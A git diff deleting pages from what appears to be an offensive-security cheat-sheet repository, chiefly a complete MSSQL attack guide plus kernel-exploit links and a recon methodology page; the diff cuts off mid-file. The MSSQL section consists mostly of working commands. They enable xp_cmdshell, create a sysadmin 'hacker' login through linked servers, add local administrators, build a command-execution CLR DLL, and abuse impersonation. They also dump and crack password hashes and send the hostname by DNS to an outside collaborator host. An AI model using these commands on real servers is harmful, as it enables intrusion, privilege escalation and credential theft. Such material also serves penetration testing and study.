-https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs -https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c -``` - -### CVE-2010-3904 (RDS) - -Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 - -```powershell -https://www.exploit-db.com/exploits/15285/ -``` - -### CVE-2010-4258 (Full Nelson) - -Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - -```powershell -https://www.exploit-db.com/exploits/15704/ -``` - -### CVE-2012-0056 (Mempodipper) - -Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - -```powershell -https://www.exploit-db.com/exploits/18411 -``` - - -## References - -- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) -- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) -- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) -- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) -- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) -- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) -- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) -- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) -- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) -- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) -* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) -* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) -* [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md deleted file mode 100644 index 339a736..0000000 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ /dev/null @@ -1,676 +0,0 @@ -# MSSQL Server - -## Summary - -* [Tools](#tools) -* [Identify Instances and Databases](#identifiy-instaces-and-databases) - * [Discover Local SQL Server Instances](#discover-local-sql-server-instances) - * [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances) - * [Discover Remote SQL Server Instances](#discover-remote-sql-instances) - * [Identify Encrypted databases](#identifiy-encrypted-databases) - * [Version Query](#version-query) -* [Identify Sensitive Information](#identify-sensitive-information) - * [Get Tables from a Specific Database](#get-tables-from-specific-databases) - * [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column) - * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) - * [Dump common information from server to files](#dump-common-information-from-server-to-files) -* [Linked Database](#linked-database) - * [Find Trusted Link](#find-trusted-link) - * [Execute Query Through The Link](#execute-query-through-the-link) - * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) - * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) - * [Query Version of Linked Database](#query-version-of-linked-database) - * [Execute Procedure on Linked Database](#execute-procedure-on-linked-database) - * [Determine Names of Linked Databases ](#determine-names-of-linked-databases) - * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) - * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) - * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) -* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) -* [Extended Stored Procedure](#extended-stored-procedure) - * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) -* [CLR Assemblies](#clr-assemblies) - * [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) - * [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) -* [OLE Automation](#ole-automation) - * [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) -* [Agent Jobs](#agent-jobs) - * [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service) - * [List All Jobs](#list-all-jobs) -* [External Scripts](#external-scripts) - * [Python](#python) - * [R](#r) -* [Audit Checks](#audit-checks) - * [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) -* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) -* [Manual SQL Server Queries](#manual-sql-server-queries) - * [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) - * [Current Role](#current-role) - * [Current DB](#current-db) - * [List all tables](#list-all-tables) - * [List all databases](#list-all-databases) - * [All Logins on Server](#all-logins-on-server) - * [All Database Users for a Database](#all-database-users-for-a-database) - * [List All Sysadmins](#list-all-sysadmins) - * [List All Database Roles](#list-all-database-role) - * [Effective Permissions from the Server](#effective-permissions-from-the-server) - * [Effective Permissions from the Database](#effective-permissions-from-the-database) - * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) - * [Exploiting Impersonation](#exploiting-impersonation) - * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) - * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) -* [References](#references) - -## Tools - -* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server -* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation. - -## Identify Instances and Databases - -### Discover Local SQL Server Instances - -```ps1 -Get-SQLInstanceLocal -``` - -### Discover Domain SQL Server Instances - -```ps1 -Get-SQLInstanceDomain -Verbose -# Get Server Info for Found Instances -Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose -# Get Database Names -Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults -``` - -### Discover Remote SQL Server Instances - -```ps1 -Get-SQLInstanceBroadcast -Verbose -Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1 -``` - -### Identify Encrypted databases -Note: These are automatically decrypted for admins - - -```ps1 -Get-SQLDatabase -Username sa -Password Password1234 -Instance "" -Verbose | Where-Object {$_.is_encrypted -eq "True"} -``` - -### Version Query - -```ps1 -Get-SQLInstanceDomain | Get-Query "select @@version" -``` - -## Identify Sensitive Information - -### Get Tables from a Specific Database - -```ps1 -Get-SQLInstanceDomain | Get-SQLTable -DatabaseName -NoDefaults -Get Column Details from a Table -Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName -TableName -``` - - -### Gather 5 Entries from Each Column - - -```ps1 -Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "" -Verbose -SampleSize 5 -``` - -### Gather 5 Entries from a Specific Table - - -```ps1 -Get-SQLQuery -Instance "" -Query 'select TOP 5 * from .dbo.' -``` - - -### Dump common information from server to files - -```ps1 -Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv -``` - -## Linked Database - -### Find Trusted Link - -```sql -select * from master..sysservers -``` - -### Execute Query Through The Link - -```sql --- execute query through the link -select * from openquery("dcorp-sql1", 'select * from master..sysservers') -select version from openquery("linkedserver", 'select @@version as version'); - --- chain multiple openquery -select version from openquery("link1",'select version from openquery("link2","select @@version as version")') - --- execute shell commands -EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer -select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') - --- create user and give admin privileges -EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" -EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" -``` - -### Crawl Links for Instances in the Domain -A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results - - -```ps1 -Get-SQLInstanceDomain | Get-SQLServerLink -Verbose -select * from master..sysservers -``` - -### Crawl Links for a Specific Instance - -```ps1 -Get-SQLServerLinkCrawl -Instance "" -Verbose -select * from openquery("",'select * from openquery("",''select * from master..sysservers'')') -``` - -### Query Version of Linked Database - - -```ps1 -Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select @@version')" -Verbose -``` - -### Execute Procedure on Linked Database - -```ps1 -SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local"; -SQL> EXECUTE('RECONFIGURE') at "linked.database.local"; -SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local"; -SQL> EXECUTE('RECONFIGURE') at "linked.database.local"; -SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local"; -``` - -### Determine Names of Linked Databases - -> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query. - -```ps1 -Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from sys.databases')" -Verbose -``` - -### Determine All the Tables Names from a Selected Linked Database - -> The result is TableName which feeds into following query - - -```ps1 -Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from .sys.tables')" -Verbose -``` - -### Gather the Top 5 Columns from a Selected Linked Table - -> The results are ColumnName and ColumnValue which feed into following query - - -```ps1 -Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select TOP 5 * from .dbo.')" -Verbose -``` - -### Gather Entries from a Selected Linked Column - - -```ps1 -Get-SQLQuery -Instance "" -Query "select * from openquery(`"`"'select * from .dbo. where =')" -Verbose -``` - - -## Command Execution via xp_cmdshell - -> xp_cmdshell disabled by default since SQL Server 2005 - -```ps1 -PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami - -# Creates and adds local user backup to the local administrators group: -PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose -PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose -``` - -* Manually execute the SQL query - ```sql - EXEC xp_cmdshell "net user"; - EXEC master..xp_cmdshell 'whoami' - EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; - EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; - ``` -* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) - ```sql - EXEC sp_configure 'show advanced options',1; - RECONFIGURE; - EXEC sp_configure 'xp_cmdshell',1; - RECONFIGURE; - ``` -* If the procedure was uninstalled - ```sql - sp_addextendedproc 'xp_cmdshell','xplog70.dll' - ``` - - -## Extended Stored Procedure - -### Add the extended stored procedure and list extended stored procedures - -```ps1 -# Create evil DLL -Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test - -# Load the DLL and call xp_test -Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" -Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" - -# Listing existing -Get-SQLStoredProcedureXP -Instance "" -Verbose -``` - -* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) -* Load the DLL - ```sql - -- can also be loaded from UNC path or Webdav - sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' - EXEC xp_calc - sp_dropextendedproc 'xp_calc' - ``` - -## CLR Assemblies - -Prerequisites: -* sysadmin privileges -* CREATE ASSEMBLY permission (or) -* ALTER ASSEMBLY permission (or) - -The execution takes place with privileges of the **service account**. - -### Execute commands using CLR assembly - -```ps1 -# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string -Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop - -# Execute command using CLR assembly -Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose -Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose -Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose - -# List all the stored procedures added using CLR -Get-SQLStoredProcedureCLR -Instance -Verbose -``` - -### Manually creating a CLR DLL and importing it - -Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` - -```csharp -using System; -using System.Data; -using System.Data.SqlClient; -using System.Data.SqlTypes; -using Microsoft.SqlServer.Server; -using System.IO; -using System.Diagnostics; -using System.Text; - -public partial class StoredProcedures -{ - [Microsoft.SqlServer.Server.SqlProcedure] - public static void cmd_exec (SqlString execCommand) - { - Process proc = new Process(); - proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; - proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); - proc.StartInfo.UseShellExecute = false; - proc.StartInfo.RedirectStandardOutput = true; - proc.Start(); - - // Create the record and specify the metadata for the columns. - SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); - - // Mark the beginning of the result set. - SqlContext.Pipe.SendResultsStart(record); - - // Set values for each column in the row - record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); - - // Send the row back to the client. - SqlContext.Pipe.SendResultsRow(record); - - // Mark the end of the result set. - SqlContext.Pipe.SendResultsEnd(); - - proc.WaitForExit(); - proc.Close(); - } -}; -``` - -Then follow these instructions: - -1. Enable `show advanced options` on the server - ```sql - sp_configure 'show advanced options',1; - RECONFIGURE - GO - ``` -2. Enable CLR on the server - ```sql - sp_configure 'clr enabled',1 - RECONFIGURE - GO - ``` -3. Import the assembly - ```sql - CREATE ASSEMBLY my_assembly - FROM 'c:\temp\cmd_exec.dll' - WITH PERMISSION_SET = UNSAFE; - ``` -4. Link the assembly to a stored procedure - ```sql - CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; - GO - ``` -5. Execute and clean - ```sql - cmd_exec "whoami" - DROP PROCEDURE cmd_exec - DROP ASSEMBLY my_assembly - ``` - -**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL - -```sql -CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM -0x4D5A90000300000004000000F[TRUNCATED] -WITH PERMISSION_SET = UNSAFE -GO -``` - -## OLE Automation - -* :warning: Disabled by default -* The execution takes place with privileges of the **service account**. - -### Execute commands using OLE automation procedures - -```ps1 -Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose -``` - -```ps1 -# Enable OLE Automation -EXEC sp_configure 'show advanced options', 1 -EXEC sp_configure reconfigure -EXEC sp_configure 'OLE Automation Procedures', 1 -EXEC sp_configure reconfigure - -# Execute commands -DECLARE @execmd INT -EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT -EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' -``` - - -```powershell -# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py -python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll -python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll' -python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll' -SQL> enable_ole -SQL> upload reciclador.dll C:\windows\temp\reciclador.dll -``` - - -## Agent Jobs - -* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. -* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. - -### Execute commands through SQL Agent Job service - -```ps1 -Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "" -Command "powershell e " -Verbose -Subsystem Options: -–Subsystem CmdExec --SubSystem PowerShell -–Subsystem VBScript -–Subsystem Jscript -``` - -```sql -USE msdb; -EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; -EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; -EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; -EXEC dbo.sp_start_job N'test_powershell_job1'; - --- delete -EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; -``` - -### List All Jobs - -```ps1 -SELECT job_id, [name] FROM msdb.dbo.sysjobs; -SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id -Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose -``` - -## External Scripts - -:warning: You need to enable **external scripts**. - -```sql -sp_configure 'external scripts enabled', 1; -RECONFIGURE; -``` - -## Python: - -```ps1 -Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose - -EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' -WITH RESULT SETS (([cmd_out] nvarchar(max))) -``` - -## R - -```ps1 -Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose - -EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' -WITH RESULT SETS (([cmd_out] text)); -GO - -@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' -``` - -## Audit Checks - - -### Find and exploit impersonation opportunities - -* Impersonate as: `EXECUTE AS LOGIN = 'sa'` -* Impersonate `dbo` with DB_OWNER - ```sql - SQL> select is_member('db_owner'); - SQL> execute as user = 'dbo' - SQL> SELECT is_srvrolemember('sysadmin') - ``` - -```ps1 -Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "" -Exploit -Verbose - -# impersonate sa account -powerpick Get-SQLQuery -Instance "" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug -``` - -## Find databases that have been configured as trustworthy - -```sql -Invoke-SQLAuditPrivTrustworthy -Instance "" -Exploit -Verbose - -SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases -``` - -> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound. - -```ps1 -Invoke-SQLAuditPrivXpDirtree -Invoke-SQLUncPathInjection -Invoke-SQLAuditPrivXpFileexist -``` - -## Manual SQL Server Queries - -### Query Current User & determine if the user is a sysadmin - -```sql -select suser_sname() -Select system_user -select is_srvrolemember('sysadmin') -``` - -### Current Role - -```sql -Select user -``` - -### Current DB - -```sql -select db_name() -``` - -### List all tables - -```sql -select table_name from information_schema.tables -``` - -### List all databases - -```sql -select name from master..sysdatabases -``` - -### All Logins on Server - -```sql -Select * from sys.server_principals where type_desc != 'SERVER_ROLE' -``` - -### All Database Users for a Database - -```sql -Select * from sys.database_principals where type_desc != 'database_role'; -``` - -### List All Sysadmins - -```sql -SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 -``` - -### List All Database Roles - -```sql -SELECT DB1.name AS DatabaseRoleName, -isnull (DB2.name, 'No members') AS DatabaseUserName -FROM sys.database_role_members AS DRM -RIGHT OUTER JOIN sys.database_principals AS DB1 -ON DRM.role_principal_id = DB1.principal_id -LEFT OUTER JOIN sys.database_principals AS DB2 -ON DRM.member_principal_id = DB2.principal_id -WHERE DB1.type = 'R' -ORDER BY DB1.name; -``` - -### Effective Permissions from the Server - -```sql -select * from fn_my_permissions(null, 'server'); -``` - -### Effective Permissions from the Database - -```sql -SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE'); -``` - -### Find SQL Server Logins Which can be Impersonated for the Current Database - -```sql -select distinct b.name -from sys.server_permissions a -inner join sys.server_principals b -on a.grantor_principal_id = b.principal_id -where a.permission_name = 'impersonate' -``` - -### Exploiting Impersonation - -```sql -SELECT SYSTEM_USER -SELECT IS_SRVROLEMEMBER('sysadmin') -EXECUTE AS LOGIN = 'adminuser' -SELECT SYSTEM_USER -SELECT IS_SRVROLEMEMBER('sysadmin') -SELECT ORIGINAL_LOGIN() -``` - -### Exploiting Nested Impersonation - -```sql -SELECT SYSTEM_USER -SELECT IS_SRVROLEMEMBER('sysadmin') -EXECUTE AS LOGIN = 'stduser' -SELECT SYSTEM_USER -EXECUTE AS LOGIN = 'sa' -SELECT IS_SRVROLEMEMBER('sysadmin') -SELECT ORIGINAL_LOGIN() -SELECT SYSTEM_USER -``` - -### MSSQL Accounts and Hashes - -```sql -MSSQL 2000: -SELECT name, password FROM master..sysxlogins -SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) - -MSSQL 2005 -SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -``` - -Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` - -```ps1 -131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 -132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe -1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 -``` - - -## References - -* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) -* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) -* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md deleted file mode 100644 index e6d2081..0000000 --- a/Methodology and Resources/Methodology and enumeration.md +++ /dev/null @@ -1,149 +0,0 @@ -# Bug Hunting Methodology and Enumeration - -## Summary - -* [Passive Recon](#passive-recon) - * Shodan - * Wayback Machine - * The Harvester - * Github OSINT - -* [Active Recon](#active-recon) - * [Network discovery](#network-discovery) - * [Web discovery](#web-discovery) - -* [Web Vulnerabilities](#looking-for-web-vulnerabilities) - -## Passive recon - -* Using [Shodan](https://www.shodan.io/) to detect similar app - - ```bash - can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse) - nmap --script shodan-hq.nse --script-args 'apikey=,target=' - ``` - -* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints - - ```bash - look for JS files, old links - curl -sX GET "http://web.archive.org/cdx/search/cdx?url=&output=text&fl=original&collapse=urlkey&matchType=prefix" - ``` - -* Using [The Harvester](https://github.com/laramies/theHarvester) - - ```python - python theHarvester.py -b all -d domain.com - ``` - -* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git) - ```bash - gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 - ``` - -* Perform Google Dorks search - - -## Active recon - -### Network discovery - -* Subdomains enumeration - * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` - * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) - * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) - * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) - -* Network discovery - * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) - * Discover services, version and banners - -* Review latest acquisitions - -* ASN enumeration - * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` - -* DNS Zone Transfer - ```ps1 - host -t ns domain.local - domain.local name server master.domain.local. - - host master.domain.local - master.domain.local has address 192.168.1.1 - - dig axfr domain.local @192.168.1.1 - ``` - -### Web discovery - -* Locate `robots.txt`, `security.txt`, `sitemap.xml` files -* Retrieve comments in source code -* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls) -* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - -* List all the subdirectories and files with `gobuster` or `ffuf` - ```ps1 - # gobuster -w wordlist -u URL -t threads - ./gobuster -u http://example.com/ -w words.txt -t 10 - ``` - -* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac) - ```bash - bfac --url http://example.com/test.php --level 4 - bfac --list testing_list.txt - ``` - -* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer - * Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...) - -* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness) - -* Automated vulnerability scanners - * [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com` - * [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner) - * [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com` - -* Manual Testing: Explore the website with a proxy: - * [Caido - A lightweight web security auditing toolkit](https://caido.io/) - * [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/) - * [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload) - - -## Looking for Web vulnerabilities - -* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, .... -* Test for Business Logic weaknesses - * High or negative numerical values - * Try all the features and click all the buttons -* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html - -* Subscribe to the site and pay for the additional functionality to test - -* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392) - > if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free - - From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. " - e.g : - - Test card numbers and tokens - - | NUMBER | BRAND | TOKEN | - | :------------- | :------------- | :------------- | - | 4242424242424242 | Visa | tok_visa | - | 4000056655665556 | Visa (debit) | tok_visa_debit | - | 5555555555554444 | Mastercard | tok_mastercard | - - International test card numbers and tokens - - | NUMBER | TOKEN | COUNTRY | BRAND | - | :------------- | :------------- | :------------- | :------------- | - | 4000000400000008 | tok_at | Austria (AT) | Visa | - | 4000000560000004 | tok_be | Belgium (BE) | Visa | - | 4000002080000001 | tok_dk | Denmark (DK) | Visa | - | 4000002460000001 | tok_fi | Finland (FI) | Visa | - | 4000002500000003 | tok_fr | France (FR) | Visa | - -## References - -* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) -* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md deleted file mode 100644 index e82618b..0000000 --- a/Methodology and Resources/Miscellaneous - Tricks.md +++ /dev/null @@ -1,27 +0,0 @@ -# Miscellaneous & Tricks - -All the tricks that couldn't be classified somewhere else. - -## Send a message to another user - -```powershell -# Windows -PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" -PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" - -# Linux -$ wall "Stop messing with the XXX service !" -$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root -$ who -$ write root pts/2 # press Ctrl+D after typing the message. -``` - -## CrackMapExec Credential Database - -```ps1 -cmedb (default) > workspace create test -cmedb (test) > workspace default -cmedb (test) > 